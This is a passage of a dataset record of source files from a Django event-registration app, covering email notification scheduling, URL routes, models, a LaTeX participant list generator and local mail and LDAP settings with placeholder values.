"src_encoding": "UTF-8", "text": "import os\nimport time\nimport django\n\nfrom datetime import timedelta\n\nfrom django.utils import timezone\nfrom django.core.mail import send_mail\nfrom django.utils.translation import gettext_lazy as _, ngettext, ngettext_lazy\nfrom django.db.models import Q\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.settings'\ndjango.setup()\n\n# needs to be after django.setup()\nfrom registration.models import Subject\nfrom mysite.settings import DEFAULT_FROM_EMAIL, BASE_URL\n\n# intervall for checking for new mails to be send\nINTERVAL = 30\n# deadtime after a mail has been sent (mail server has 10 Mails/minute restriction)\nDEADTIME = 10\nconfirm_url = lambda base, token: os.path.join(base, token, 'confirm')\nmodify_url = lambda base, token: os.path.join(base, token, 'modify')\n\ndef do_send_mail(subject, message, to):\n try:\n send_mail(subject, message, DEFAULT_FROM_EMAIL, [to])\n time.sleep(DEADTIME)\n return True \n except Exception as e:\n print(e)\n return False \n\n## send when the subject registers for the event,\n## contains the link for the registration confirmation\ndef confirmation_request_mail(sub):\n subject = _('Registration for %s')\n message = _('mail_body_%(name)s_%(event)s_%(hold_back_hours)i_%(confirm_url)s')\n\n subject = subject%sub.event.title\n message = message%dict(\n name=sub.given_name,\n event=sub.event,\n hold_back_hours=sub.event.hold_back_hours,\n confirm_url=confirm_url(BASE_URL, sub.token),\n modify_url=modify_url(BASE_URL, sub.token)\n )\n return do_send_mail(subject, message, sub.email)\n\n## send after some timeout to warn about registration deletion\ndef remainder_mail(sub):\n subject = _('Reminder of registration for %s')\n message = _('reminder_body_%(name)s_%(event)s_%(cancel_hours)i_%(confirm_url)s_%(modify_url)s')\n\n subject = subject%sub.event.title\n message = message%dict(\n name=sub.given_name,\n event=sub.event,\n cancel_hours=sub.event.hold_back_hours - sub.event.reminder_hours,\n confirm_url=confirm_url(BASE_URL, sub.token),\n modify_url=modify_url(BASE_URL, sub.token)\n )\n return do_send_mail(subject, message, sub.email)\n\n## send when the subject clicked on the registration confirmation link\ndef confirmation_mail(sub):\n subject = _('Confirmed registration for %s')\n message = _('confirmation_body_%(name)s_%(event)s_%(modify_url)s_%(seats)s')\n\n seats = ''\n if sub.event.assigned_seats:\n seats = _(ngettext_lazy(\n 'subject_seats_%(seat_nums)s',\n 'subject_seats_pl_%(seat_nums)s',\n sub.num_seats))%dict(seat_nums=sub.seats)\n seats += '\\n(Plan: %s/static/registration/GHS_physik.pdf)\\n'%BASE_URL\n\n subject = subject%sub.event.title\n message = message%dict(\n name=sub.given_name,\n event=sub.event,\n seats=seats,\n modify_url=modify_url(BASE_URL, sub.token),\n )\n return do_send_mail(subject, message, sub.email)\n\ndef cancellation_mail(sub):\n subject = _('Cancellation of registration for %s')\n message = _('cancellation_body_%(name)s_%(event)s')\n\n subject = subject%sub.event.title\n message = message%dict(\n name=sub.given_name,\n event=sub.event,\n ) \n return do_send_mail(subject, message, sub.email)\n\ndef next_subject(query):\n try:\n sub = Subject.objects \\\n .filter(query) \\\n .order_by('reg_date')[0]\n return sub\n except:\n return None\n\ndef handle_new_subjects():\n while True:\n sub = next_subject(Q(confirmation_request_sent=False))\n if sub is None: return True\n if not confirmation_request_mail(sub): break\n sub.confirmation_request_sent = True\n sub.save() \n return False\n\ndef handle_confirmed_subjects():\n while True:\n sub = next_subject(Q(status_confirmed=True) & Q(confirmation_sent=False))\n if sub is None: return True\n if not confirmation_mail(sub): break\n sub.confirmation_sent = True\n sub.save() \n return False\n\ndef handle_pending_subjects():\n while True:\n # fetch new list of pending subjects\n subs = Subject.objects \\\n .filter(confirmation_request_sent=True, status_confirmed=False) \\\n .order_by('reg_date')\n\n # nothing to do anymore, so return\n if len(subs) == 0: return True\n\n # iterate over possible subject until one is found where email has to be send. Then\n # start all over to minimize risk that s.t. has changed in the DB in the meantime\n mail_sent=False\n for sub in subs:\n if not sub.reminder_sent:\n # check, how long ago the request was send... send remainder (once) if certain timeout hit\n if timezone.now() > sub.reg_date + timedelta(hours=sub.event.reminder_hours):\n if not remainder_mail(sub): return False\n sub.reminder_sent = True\n sub.save() \n mail_sent=True\n break\n else:\n if timezone.now() > sub.reg_date + timedelta(hours=sub.event.hold_back_hours): \n if not cancellation_mail(sub): return False\n sub.delete()\n mail_sent=True\n break\n\n # nothing to do for matching subjects\n if not mail_sent:\n return True\n\ndef mailer():\n if not handle_new_subjects(): return\n if not handle_pending_subjects(): return\n if not handle_confirmed_subjects(): return\n\nif __name__ == \"__main__\":\n try:\n while True:\n mailer()\n time.sleep(INTERVAL)\n except (KeyboardInterrupt, SystemExit):\n print(\"Exiting\")\n except Exception as e:\n raise e" }, { "alpha_fraction": 0.69901442527771, "alphanum_fraction": 0.69901442527771, "avg_line_length": 59, "blob_id": "df600539c8f4dcd653b57961abf0f8ce4a26855d", "content_id": "ecf9559a760592105975c9eb46a9c94815c0c38a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1319, "license_type": "permissive", "max_line_length": 98, "num_lines": 22, "path": "/registration/urls.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.CreateSubjectView.as_view(), name='index'),\n path('privacy', lambda r: render(r, \"registration/privacy.html\"), name='privacy'),\n path('site_notice', lambda r: render(r, \"registration/site_notice.html\"), name='site_notice'),\n path('<token>/confirm', views.confirm, name='subject-confirm'),\n path('<slug:slug>/modify', views.SubjectView.as_view(), name='subject-modify'),\n path('<slug:slug>/delete', views.DeleteSubjectView.as_view(), name='subject-delete'),\n path('submitted', views.submitted, name='submitted'),\n path('subjects', views.ListSubjectView.as_view(), name='subjects'),\n path('subjects/create', views.CreateSubjectViewAdmin.as_view(), name='subjects-create'),\n path('subjects/<slug:pk>', views.SubjectViewAdmin.as_view(), name='subjects-detail'),\n path('events', views.ListEventView.as_view(), name='events'),\n path('events/create', views.CreateEventView.as_view(), name='events-create'),\n path('events/<slug:pk>/delete', views.DeleteEventView.as_view(), name='events-delete'),\n path('events/<slug:pk>/participants', views.subject_table, name='events-participants'),\n path('events/<slug:pk>', views.EventView.as_view(), name='events-detail'),\n]" }, { "alpha_fraction": 0.5043478012084961, "alphanum_fraction": 0.686956524848938, "avg_line_length": 18.16666603088379, "blob_id": "7ced292224c1ca65d22d206ec893f0b9a6eba96b", "content_id": "50284a4b7e0e7231eb94673b9c3617f3bcd19f67", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 115, "license_type": "permissive", "max_line_length": 25, "num_lines": 6, "path": "/requirements.txt", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "django==2.2.28\ndjango-material==1.5.8\ndjango-tables2==2.1.0\n# django-auth-ldap==2.2.0\npsycopg2==2.8.6\nnames==0.3.0\n" }, { "alpha_fraction": 0.5719298124313354, "alphanum_fraction": 0.5859649181365967, "avg_line_length": 32.52941131591797, "blob_id": "575ac603ab90b0d0437d821acb3b805541ca3559", "content_id": "43870033b65ed2dff87136244b79d4e2e7a487ee", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 570, "license_type": "permissive", "max_line_length": 121, "num_lines": 17, "path": "/registration/templates/registration/confirm.html", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "{% extends \"registration/base.html\" %}\n{% block content %}\n\n<div>\n {% load i18n %}\n <div style=\"margin: 30 0 30 0\">\n <div class=\"btn green\" style=\"height: auto\">\n {% blocktrans %}Your registration for event {{event}} is confirmed!{% endblocktrans %}\n </div>\n {% if event.assigned_seats %}\n {% blocktrans %}A confirmation email will be sent to you which also includes your seat number.{% endblocktrans %}\n {% endif %}\n </div>\n <a href=\"JavaScript:window.close()\">{% trans \"Close page.\" %} </a>\n</div>\n\n{% endblock %}\n" }, { "alpha_fraction": 0.7048878073692322, "alphanum_fraction": 0.7156471014022827, "avg_line_length": 43.5616455078125, "blob_id": "51bb64927b4d711e02ff40c08f41d26947fa8842", "content_id": "6d421c7a9322bcedb90d231ee00f48501134f465", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3253, "license_type": "permissive", "max_line_length": 160, "num_lines": 73, "path": "/registration/models.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "import secrets\n\nfrom django.core.validators import MinValueValidator\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.urls import reverse\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.validators import int_list_validator\n\nfrom mysite import settings\n\n\nclass Event(models.Model):\n title = models.CharField(max_length=1024, help_text='name of the event')\n date = models.DateTimeField(default=timezone.now, help_text='date and time of the event')\n is_active = models.BooleanField(default=True)\n num_total_seats = models.IntegerField(help_text=\"total number of seats available\")\n num_max_per_subject = models.IntegerField(default=5, help_text=\"maximum number of seats that can be booked by one person\")\n enable_on = models.DateTimeField(_('enable_on'), default=timezone.now)\n disable_on = models.DateTimeField(_('disable_on'), default=timezone.now)\n assigned_seats = models.BooleanField(default=False, help_text=\"each entry has an assigned seat number\")\n reminder_hours = models.IntegerField(default=12, help_text=\"hours to wait after registration before sending the reminder for the registration confirmation\")\n hold_back_hours = models.IntegerField(default=24, help_text=\"hours to wait after registration before cancelling a registration that was not confirmed\")\n\n @property\n def seats_taken(self):\n return sum(map(lambda x: x.num_seats, Subject.objects.filter(event=self)))\n\n def get_absolute_url(self):\n return reverse('event-detail', args=[self.id])\n\n def __str__(self):\n return _(\"'%(title)s' on %(date)s\")%dict(title=self.title, date=timezone.localtime(self.date).strftime('%d.%m.%y %H:%M'))\n\n\ndef token():\n return secrets.token_urlsafe(32)\n\n\nclass SubjectBase(models.Model):\n name = models.CharField(_('name'), max_length=200)\n given_name = models.CharField(_('given_name'), max_length=200)\n email = models.EmailField(_('email'), max_length=200)\n\n event = models.ForeignKey(Event, verbose_name=_('event'), on_delete=models.CASCADE)\n reg_date = models.DateTimeField(_('reg_date'), default=timezone.now)\n num_seats = models.IntegerField(_('num_seats'), default=1, validators=[MinValueValidator(1)])\n seats = models.CharField(_('seats'), max_length=1024, default='', validators=[int_list_validator])\n\n status_confirmed = models.BooleanField(_('status_confirmed'), default=False)\n confirmation_request_sent = models.BooleanField(_('confirmation_request_sent'), default=False)\n confirmation_sent = models.BooleanField(_('confirmation_sent'), default=False)\n reminder_sent = models.BooleanField(_('reminder_sent'), default=False)\n token = models.CharField(max_length=255, default=token)\n\n class Meta:\n unique_together = ('event', 'email')\n\n def get_absolute_url(self):\n return reverse('subject-modify', args=[self.token])\n\n def __str__(self):\n return \"%s\"%(self.event)\n\n\nclass SubjectExtended(SubjectBase):\n address = models.CharField(_('address'), max_length=50)\n city = models.CharField(_('city'), max_length=60)\n post_code = models.IntegerField(_('post_code'))\n phone = models.CharField(_('phone'), max_length=50)\n\n\nSubject = eval(settings.SUBJECT_CLASS)\n" }, { "alpha_fraction": 0.5638531446456909, "alphanum_fraction": 0.5776592493057251, "avg_line_length": 25.781513214111328, "blob_id": "53c3440b5327d2ee3eca1fee68707be38f23cf69", "content_id": "f5d8a051214cce3a80094cec50ac89e99833b237", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3187, "license_type": "permissive", "max_line_length": 116, "num_lines": 119, "path": "/registration/sub_table_tex.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport shutil, re\nfrom io import StringIO\nimport os\nimport string\nimport subprocess\nfrom django.utils.translation import gettext_lazy as _, ngettext_lazy\n\n\nLATEX_TEMPLATE = string.Template(\n r'''\\documentclass[a4paper]{article}\n\\usepackage[ngerman]{babel}\n\\usepackage[utf8]{inputenc}\n\\usepackage[T1]{fontenc}\n\n$options\n\\usepackage{booktabs}\n\\usepackage{longtable}\n\\usepackage{pifont}\n\\usepackage[%\n left=0.50in,%\n right=0.50in,%\n top=1.0in,%\n bottom=1.0in,%\n paperheight=11in,%\n paperwidth=8.5in%\n]{geometry}%\n\n\\title{$title}\n\t \n\\begin{document}\n\\maketitle\n\n\\begin{center}\n\\begin{longtable}{ r p{0.15\\textwidth} p{0.15\\textwidth} p{0.35\\textwidth} | r | c | c}\n$header\n\\toprule\n$rows\n\\end{longtable}\n\\end{center}\n\\end{document} \n '''\n)\n\n\n# https://stackoverflow.com/questions/16259923/how-can-i-escape-latex-special-characters-inside-django-templates\ndef tex_escape(text):\n \"\"\"\n :param text: a plain text message\n :return: the message escaped to appear correctly in LaTeX\n \"\"\"\n conv = {\n '&': r'\\&',\n '%': r'\\%',\n '$': r'\\$',\n '#': r'\\#',\n '_': r'\\_',\n '{': r'\\{',\n '}': r'\\}',\n '~': r'\\textasciitilde{}',\n '^': r'\\^{}',\n '\\\\': r'\\textbackslash{}',\n '<': r'\\textless{}',\n '>': r'\\textgreater{}',\n }\n regex = re.compile('|'.join(re.escape(str(key)) for key in sorted(conv.keys(), key = lambda item: - len(item))))\n return regex.sub(lambda match: conv[match.group()], text)\n\n\ndef create_table(ev, subjects):\n project_path = os.path.curdir\n build_path = os.path.join(project_path, '.build')\n out_filename = os.path.join(build_path, 'template')\n documentclass_name = 'article'\n\n options = []\n options_latex = '\\n'.join(\n r'\\newcommand{\\%s}{%s}' % pair for pair in options\n )\n options_latex = ''\n title = ''\n\n if len(subjects)>0:\n title = str(subjects[0].event)\n seats = subjects[0].event.num_max_per_subject\n\n rows = StringIO()\n for i, sub in enumerate(subjects):\n row = list(map(tex_escape, [\n str(i+1),\n sub.name,\n sub.given_name,\n sub.email]))\n row.extend([\n sub.seats if ev.assigned_seats else str(sub.num_seats),\n '\\\\ding{51}' if sub.status_confirmed else '\\\\ding{55}',\n ''\n ])\n rows.write('%s\\\\\\\\ \\\\hline \\n' % ' & '.join(row))\n\n header = '%s\\\\\\\\ \\n' % ' & '.join(\n map(str, ['', _('name'), _('given_name'), _('email'), \n ngettext_lazy('seat', 'seats', seats), _('confirmed'), _('present')]))\n\n latex = LATEX_TEMPLATE.safe_substitute(\n options=options_latex, documentclass=documentclass_name,\n title=title,\n header=header, rows=rows.getvalue(),\n )\n\n shutil.rmtree(build_path, ignore_errors=True)\n\n os.makedirs(build_path, exist_ok=True)\n with open(out_filename + '.tex', 'w') as out_file:\n out_file.write(latex)\n\n subprocess.run(['pdflatex', '-output-directory', build_path, out_filename])\n # shutil.copy2(out_filename + '.pdf', os.path.dirname(in_filename))\n return out_filename+'.pdf'\n" }, { "alpha_fraction": 0.6746602654457092, "alphanum_fraction": 0.6866506934165955, "avg_line_length": 31.102563858032227, "blob_id": "314ea13d2f59f0ff90496a82d6c4372b413ef5a8", "content_id": "d505ad14876534f875cc5985802fb171da02f520", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1251, "license_type": "permissive", "max_line_length": 99, "num_lines": 39, "path": "/mysite/local_settings.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "import os\n\n# LDAP authentication example configuration, requires django-auth-ldap package\n# try:\n# import ldap\n# from django_auth_ldap.config import LDAPSearch\n# AUTHENTICATION_BACKENDS = [\"django_auth_ldap.backend.LDAPBackend\"]\n# AUTH_LDAP_SERVER_URI = \"ldap://__ldap_server__/\"\n\n# AUTH_LDAP_BIND_DN = \"\"\n# AUTH_LDAP_BIND_PASSWORD = \"\"\n# AUTH_LDAP_USER_SEARCH = LDAPSearch(\n# \" cn=__some__,dc=__ldap__,dc=__de__\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n# )\n# except:\n# pass\n\n\n# Mailing\n### backend for testing, comment for production\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n# Python has a little SMTP server built-in. You can start it in a second console with this command:\n# python -m smtpd -n -c DebuggingServer localhost:1025\n# This will simply print all the mails sent to localhost:1025 in the console.\n# You have to configure Django to use this server in your settings.py:\n# EMAIL_HOST = 'localhost'\n# EMAIL_PORT = 1025\n\n### production email configuration\n# EMAIL_HOST = '__mailserver__'\n# EMAIL_PORT = 587\n# EMAIL_HOST_USER = '__mailuser__'\n# EMAIL_HOST_PASSWORD = '__mailuserpw__'\n# EMAIL_USE_TLS = True\nDEFAULT_FROM_EMAIL = '__from-email__'\n\nDEBUG = True\nPRIVACY_NOTICE = True" } ]
13
whalehulk/vidpy
https://github.com/whalehulk/vidpy
29c04eb6df8469c3758f4419b7bdd3ca11651f4f
6bf7770e3ef4d58da6ce716be404b5e63e21c18d
9b48efe91a754d493d6aafccc9a83e75d4a88083
refs/heads/master
2021-09-07T15:51:58.641513
2018-02-25T14:12:12
2018-02-25T14:12:12
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6677461266517639, "alphanum_fraction": 0.6690414547920227, "avg_line_length": 29.27450942993164, "blob_id": "182ed370ad836ccc967b8966341864cdb76dc642", "content_id": "0db722359fff9e78bdf981620df88d363276371c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1544, "license_type": "permissive", "max_line_length": 77, "num_lines": 51, "path": "/magooshScraper.py", "repo_name": "whalehulk/vidpy", "src_encoding": "UTF-8", "text": "import scrapy\nfrom bs4 import BeautifulSoup\n\nclass scraper(scrapy.Spider):\n\tname = 'mangoosh'\n\tstart_urls = ['http://gre.magoosh.com/login']\n\n\tdef parse(self, response):\n\t\treturn scrapy.FormRequest.from_response(\n\t\t\tresponse,\n\t\t\t'''\n\t\t\tReplace the fake text below with your own registered\n\t\t\temail and password on http://gre.magoosh.com:\n\t\t\t'''\n\t\t\tformdata={'session[login]': '[email protected]', 'session[password]': 'root@09'},\n\t\t\tcallback=self.after_login\n\t\t)\n\n\tdef after_login(self, response):\n\t\tif 'Dashboard' in response.body:\n\t\t\tself.logger.info('Logged in successfully!')\n\n\t\treturn scrapy.Request('http://gre.magoosh.com/lessons',\n\t\t\tcallback=self.lessonsPage_loaded)\n\n\tdef lessonsPage_loaded(self, response):\n\t\tself.logger.info('Lessons page opened.')\n\t\tsoup = BeautifulSoup(response.body)\n\t\tfor categ in soup.find_all('h2'):\n\t\t\t# Set the Subject name to crawl\n\t\t\t# In this example, Maths section is scraped.\n\t\t\tif 'Math' in categ:\n\t\t\t\tself.logger.info('Math section found.')\n\t\t\t\tcgparent = categ.parent.parent\n\t\t\t\tfor vu in cgparent.find_all('a'):\n\t\t\t\t\tlink = str(vu.get('href'))\n\t\t\t\t\tif '/lessons/' in link:\n\t\t\t\t\t\ts = 'http://gre.magoosh.com' + link + \"\\n\"\n\t\t\t\t\t\treq = scrapy.Request(s, callback=self.videoPage_loaded)\n\t\t\t\t\t\tyield req\n\t\treturn\n\n\tdef videoPage_loaded(self, response):\n\t\tself.logger.info('Fetching video...')\n\t\tsoup = BeautifulSoup(response.body)\n\t\tfor div in soup.find_all('div'):\n\t\t\tif div.get('data-file'):\n\t\t\t\tvl = div.get('data-file')\n\t\t\t\tf = open('scrapedVideoLinks.txt', 'a')\n\t\t\t\tf.write(str(vl) + '\\n')\n\t\t\t\tf.close()\n" }, { "alpha_fraction": 0.7677275538444519, "alphanum_fraction": 0.7716359496116638, "avg_line_length": 73.625, "blob_id": "89e9e0963b4a1187bf87a4c28b3096fd395231bc", "content_id": "87aad3ef3f88a5fa8789c04cca6e48e2d4c6ed83", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1791, "license_type": "permissive", "max_line_length": 455, "num_lines": 24, "path": "/README.md", "repo_name": "whalehulk/vidpy", "src_encoding": "UTF-8", "text": "# vidpy\nA Python based customizable script for getting/scraping links to videos hosted on any website. Implemented using Scrapy and BeautifulSoup.\n\n#### Why?\nI created this script for my friend who didn't watch all the videos in the Maths section from [gre.magoosh.com](http://gre.magoosh.com) and was worried about his ending subscription. There were way too many steps to go through and download all the videos. So I built this script with just 2 hours of effort to scrape all the links to the videos (where they were directly hosted, in this case, Cloudfront), so that he can download all the videos in one go.\n\n### Demo:\n[![Vidpy Demo Video](http://img.youtube.com/vi/yr1EYLmSIdo/0.jpg)](http://youtu.be/yr1EYLmSIdo)\n\n#### Requirements:\n- A valid subscription is neccessary for downloading videos off the site.\n- Scrapy and BeautifulSoup should be installed for the script to work. Links:\n - [Install Scrapy](http://doc.scrapy.org/en/1.0/intro/install.html)\n - [Install BeautifulSoup](http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-beautiful-soup)\n\n#### Executing the script:\nSee [Scrapy's documentation](http://doc.scrapy.org/en/latest/intro/tutorial.html) to learn how to execute spiders and crawlers.\n\n#### Features:\n- You can customize this Python code to different categories in the site. In the current code, only the videos in Mathematics section will be scraped from [gre.magoosh.com](http://gre.magoosh.com).\n- The algorithm and logic behind this script can be applied to any site to extract any form of data with precision.\n- Only the stuff you need will be extracted and rest all will be ignored. This saves time and overall bandwidth used to successfully run the script.\n\n**Note to contributors:** Please update the documentation whenever neccessary.\n" } ]
2
tmacli/product-tracker-mine
https://github.com/tmacli/product-tracker-mine
3cbf26fb092a9523b9a8afe4058d7215c82c97b1
f1728f3b2fa34f8a4c00eca860ffa0f71d59f4e7
0d47cdd00e4460e5e9cc36f0de7ad5b0ff1a46d7
refs/heads/master
2022-04-25T18:08:57.694193
2020-04-29T03:17:27
2020-04-29T03:17:27
259,700,598
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5589970350265503, "alphanum_fraction": 0.6120021939277649, "avg_line_length": 45.55263137817383, "blob_id": "338cba0fcbd35fb7b4c7930ee26227a818632dab", "content_id": "8892e06ec2c28c27bf87ac149c79aaf96f9b3616", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10848, "license_type": "no_license", "max_line_length": 477, "num_lines": 228, "path": "/app.py", "repo_name": "tmacli/product-tracker-mine", "src_encoding": "UTF-8", "text": "# https://github.com/tnware/product-checker\r\n# by Tyler Woods\r\n# coded for Bird Bot and friends\r\n# https://tylermade.net\r\nimport requests\r\nimport time\r\nimport json\r\nfrom datetime import datetime\r\nimport urllib.parse as urlparse\r\nfrom urllib.parse import parse_qs\r\nimport csv\r\nstockdict = {}\r\nsku_dict = {}\r\nbestbuylist = []\r\ntargetlist = []\r\nwalmartlist = []\r\nbbdict = {}\r\n\r\n\r\nwebhook_dict = {\r\n#\"name_your_webhook\": \"http://your.webhook.url/123\"\r\n\r\n# Best Buy - Nintendo\r\n\r\n\"bb_neon_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"bb_gray_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"bb_animalcrossing_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"bb_ringfit\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\r\n# Best Buy - Webcams\r\n\r\n\"bb_logitech_c920s\": \"https://discordapp.com/api/webhooks/704744387615260784/HxNrljwTKMTBnRg5A7NuepkXZOLC-nZVq28xJPe6algexvunX0trPKgugEZbQ7SJB8sc\",\r\n\"bb_logitech_c920\": \"https://discordapp.com/api/webhooks/704744387615260784/HxNrljwTKMTBnRg5A7NuepkXZOLC-nZVq28xJPe6algexvunX0trPKgugEZbQ7SJB8sc\",\r\n\"bb_logitech_c922\": \"https://discordapp.com/api/webhooks/704744387615260784/HxNrljwTKMTBnRg5A7NuepkXZOLC-nZVq28xJPe6algexvunX0trPKgugEZbQ7SJB8sc\",\r\n\r\n# Target Nintendo\r\n\r\n\"target_neon_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"target_gray_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"target_ringfit\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\r\n# Walmart Nintendo\r\n\r\n\"walmart_neon_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"walmart_gray_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"walmart_animalcrossing_switch\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\",\r\n\"walmart_ringfit\": \"https://discordapp.com/api/webhooks/704891256765022208/iXKaouZpwtWdW9vxqKp8OPlFSoCsICNnoAJqvjczYPKtfU6Y6tAhz3lfpP_Q6RefGsTu\"\r\n}\r\n\r\n\r\nurldict = {\r\n#\"http://product.url/123\": \"name_your_webhook\",\r\n# Best Buy - Nintendo\r\n\"https://www.bestbuy.com/site/nintendo-switch-32gb-console-neon-red-neon-blue-joy-con/6364255.p?skuId=6364255\": \"bb_neon_switch\",\r\n\"https://www.bestbuy.com/site/nintendo-switch-32gb-console-gray-joy-con/6364253.p?skuId=6364253\": \"bb_gray_switch\",\r\n\"https://www.bestbuy.com/site/nintendo-switch-animal-crossing-new-horizons-edition-32gb-console-multi/6401728.p?skuId=6401728\": \"bb_animalcrossing_switch\",\r\n\"https://www.bestbuy.com/site/ring-fit-adventure-nintendo-switch/6352149.p?skuId=6352149\": \"bb_ringfit\",\r\n\r\n# Best Buy - Webcams\r\n\"https://www.bestbuy.com/site/logitech-c920s-hd-webcam/6321794.p?skuId=6321794\": \"bb_logitech_c920s\",\r\n\"https://www.bestbuy.com/site/logitech-c920-pro-webcam-black/4612476.p?skuId=4612476\": \"bb_logitech_c920\",\r\n\"https://www.bestbuy.com/site/logitech-c922-pro-stream-webcam/5579380.p?skuId=5579380\": \"bb_logitech_c922\",\r\n\r\n# Target Nintendo\r\n\r\n\"https://www.target.com/p/nintendo-switch-with-neon-blue-and-neon-red-joy-con/-/A-77464001\": \"target_neon_switch\",\r\n\"https://www.target.com/p/nintendo-switch-with-gray-joy-con/-/A-77464002\": \"target_gray_switch\",\r\n\"https://www.target.com/p/ring-fit-adventure---nintendo-switch/-/A-76593324\": \"target_ringfit\",\r\n\r\n# Walmart Nintendo\r\n\r\n\"https://www.walmart.com/ip/Nintendo-Switch-Console-with-Neon-Blue-Red-Joy-Con/709776123?selectedSellerId=0&irgwc=1&sourceid=imp_URNysUUQixyORUtwUx0Mo38XUki2dTUUET5x3c0&veh=aff&wmlspartner=imp_10078&clickid=URNysUUQixyORUtwUx0Mo38XUki2dTUUET5x3c0\": \"walmart_neon_switch\",\r\n\"https://www.walmart.com/ip/Nintendo-Switch-Console-with-Gray-Joy-Con/994790027?selectedSellerId=0&irgwc=1&sourceid=imp_URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0&veh=aff&wmlspartner=imp_10078&clickid=URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0\": \"walmart_gray_switch\",\r\n\"https://www.walmart.com/ip/Nintendo-Switch-Console-Animal-Crossing-New-Horizons-Edition/539083068?selectedSellerId=0&irgwc=1&sourceid=imp_URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0&veh=aff&wmlspartner=imp_10078&clickid=URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0\": \"walmart_animalcrossing_switch\",\r\n\"https://www.walmart.com/ip/Nintendo-Switch-Ring-Fit-Adventure-Black/434503657?selectedSellerId=0&irgwc=1&sourceid=imp_URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0&veh=aff&wmlspartner=imp_10078&clickid=URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0\": \"walmart_ringfit\"\r\n}\r\n\r\nclass Target:\r\n\r\n def __init__(self, url, hook):\r\n self.url = url\r\n self.hook = hook\r\n webhook_url = webhook_dict[hook]\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n page = requests.get(url)\r\n al = page.text\r\n title = al[al.find('\"twitter\":{\"title\":') + 20 : al.find('\",\"card')]\r\n #print(title)\r\n if \"Temporarily out of stock\" in page.text:\r\n print(\"[\" + current_time + \"] \" + \"Sold Out: (Target.com) \" + title + \"\\n\")\r\n stockdict.update({url: 'False'})\r\n else: \r\n print(\"[\" + current_time + \"] \" + \"In Stock: (Target.com) \" + title + \" - \" + url)\r\n slack_data = {'content': current_time + \" \" + title + \" in stock at Target - \" + url}\r\n if stockdict.get(url) == 'False':\r\n response = requests.post(\r\n webhook_url, data=json.dumps(slack_data),\r\n headers={'Content-Type': 'application/json'})\r\n stockdict.update({url: 'True'})\r\n #print(stockdict)\r\n\r\nclass BestBuy:\r\n\r\n def __init__(self, sku, hook):\r\n self.sku = sku\r\n self.hook = hook\r\n webhook_url = 